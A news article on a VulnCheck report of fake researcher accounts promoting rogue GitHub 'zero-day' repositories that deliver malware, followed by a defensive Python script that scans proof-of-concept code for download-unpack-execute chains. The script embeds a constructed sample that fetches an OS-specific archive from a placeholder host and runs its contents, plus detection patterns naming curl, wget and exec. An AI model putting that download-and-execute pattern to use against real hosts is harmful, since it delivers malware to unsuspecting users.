A hacker has launched an unusual attack campaign by creating rogue GitHub repositories that claim to host zero-day exploits for popular applications but instead deliver malware. To make matters even more deceptive, the attacker went to great lengths to create fake GitHub and Twitter accounts, posing as security researchers and using real photos of researchers from well-known cybersecurity firms.
According to a report by security firm VulnCheck, the attacker’s persistence indicates a belief that these attacks will be successful, despite the fact that the delivered malware is quite obvious. While targeting security researchers is not entirely new, such attacks are relatively rare and are typically attributed to advanced persistent threat (APT) groups who seek access to sensitive information. An example of this is a campaign reported by Google’s Threat Analysis Group in 2021, where a government-backed North Korean entity created a web of fake accounts posing as security researchers to promote proof-of-concept exploits.
In that 2021 campaign, the attacker used the fake accounts to contact real researchers and invite them to collaborate. As part of the communication, a Visual Studio project containing proof-of-concept exploit code was shared, but it also contained a malicious DLL that deployed malware on the victim’s computer. Additionally, some researchers who merely visited the attacker’s blog had their fully patched systems exploited, suggesting the presence of zero-day exploits in the attacker’s arsenal.
VulnCheck first discovered one of these rogue repositories in early May and promptly reported it to GitHub, resulting in its removal. This particular repository claimed to host a zero-day exploit for Signal, a popular secure communications app. Despite the takedown, the attacker persisted and created new accounts and repositories with fake exploits for Microsoft Exchange, Google Chrome, Discord, and Chromium. The fake accounts created for this campaign claimed to belong to researchers working for a non-existent company called High Sierra Cyber Security. The same names and profile information were then used to create Twitter accounts to further promote the repositories.
It’s important to note that although this campaign shares similarities with the Google-identified attack in 2021, it appears to be less sophisticated. The malicious code distributed from the rogue GitHub repositories is a file named poc.py, which downloads either cveslinux.zip or cveswindows.zip depending on the victim’s operating system. These archive files are unpacked, and the contained files are executed. The Windows payload is flagged by 36 antivirus programs as a trojan, while the Linux binary is flagged by 25.
The VulnCheck researchers state that it is unclear whether this campaign is the work of a single individual or a more sophisticated group. Nonetheless, this highlights the fact that security researchers are attractive targets for malicious actors. As a precaution, researchers should exercise caution when downloading code from GitHub, carefully reviewing the code they are executing and avoiding the use of anything they don’t understand.
Experienced security researchers typically take precautions when handling potentially malicious code. They usually test proof-of-concept exploits on isolated test systems inside virtual machines, which allows close monitoring of what the code does and lets the machine be wiped and restored easily afterwards. Executing such code on a work machine would likely violate standard security policies, particularly within a cybersecurity company.
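The review step the article recommends can be partly automated. The following script is an added example, not code from the article or from VulnCheck: it performs a quick static triage of a downloaded proof-of-concept script and flags the download, unpack and execute chain the article describes for the rogue poc.py files, plus any operating-system branching. The sample script it scans is constructed here to mimic that behaviour (the `example.invalid` URL is a placeholder), and the indicator patterns are this example's own assumption rather than a published signature; the approach generalizes to any script, not only the one the article describes.

```python
"""Static triage of a downloaded proof-of-concept script before it is run.

Added example (not from the article or VulnCheck). It flags the
download -> unpack -> execute chain the article describes. The sample
script and the indicator list below are constructed assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed stand-in for a rogue poc.py: OS-dependent archive download,
# unpack, then execution of everything that was unpacked.
SAMPLE_POC = r'''
import os, platform, zipfile, subprocess, urllib.request

if platform.system() == "Windows":
    url = "https://example.invalid/cveswindows.zip"
else:
    url = "https://example.invalid/cveslinux.zip"
urllib.request.urlretrieve(url, "cves.zip")
with zipfile.ZipFile("cves.zip") as z:
    z.extractall("cves")
for f in os.listdir("cves"):
    subprocess.call(os.path.join("cves", f))
'''

# Each regex marks one stage of the chain (assumed indicators, not a signature).
INDICATORS = {
    "download": [r"urllib\.request\.urlretrieve", r"urlopen\(", r"requests\.get\(",
                 r"wget\s", r"curl\s"],
    "unpack": [r"zipfile\.ZipFile", r"extractall\(", r"tarfile\.open", r"unzip\s"],
    "execute": [r"subprocess\.(call|run|Popen)", r"os\.system\(", r"os\.exec",
                r"exec\(", r"eval\("],
    "os_branch": [r"platform\.system\(\)", r"sys\.platform", r"os\.name"],
}


@dataclass
class TriageResult:
    # stage name -> list of (line number, source line) that matched
    stages: dict = field(default_factory=dict)

    @property
    def full_chain(self) -> bool:
        """True when download, unpack and execute indicators are all present."""
        return all(self.stages.get(s) for s in ("download", "unpack", "execute"))

    @property
    def verdict(self) -> str:
        if self.full_chain:
            return "REVIEW: download/unpack/execute chain present; run only in an isolated VM"
        if self.stages:
            return "CAUTION: partial indicators"
        return "no chain indicators"


def triage(source: str) -> TriageResult:
    """Scan script source line by line and record which chain stages appear."""
    result = TriageResult()
    for no, line in enumerate(source.splitlines(), 1):
        code_only = line.split("#", 1)[0]  # ignore trailing comments
        for stage, patterns in INDICATORS.items():
            if any(re.search(p, code_only) for p in patterns):
                result.stages.setdefault(stage, []).append((no, line.strip()))
    return result


if __name__ == "__main__":
    report = triage(SAMPLE_POC)
    print(report.verdict)
    for stage, hits in report.stages.items():
        for no, line in hits:
            print(f"  [{stage}] line {no}: {line}")
```

A hit is a prompt for a human to read the flagged lines, not a conviction: legitimate PoCs sometimes fetch a helper archive, but one that downloads an opaque binary chosen by operating system and immediately runs it is exactly the pattern the article describes and deserves a closer look inside an isolated VM.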
In conclusion, this recent attack campaign targeting security researchers through rogue GitHub repositories underscores the need for continuous vigilance in the cybersecurity community. As cyber threats continue to evolve, researchers must remain cautious when engaging with unknown code sources and always prioritize code review and understanding before execution.
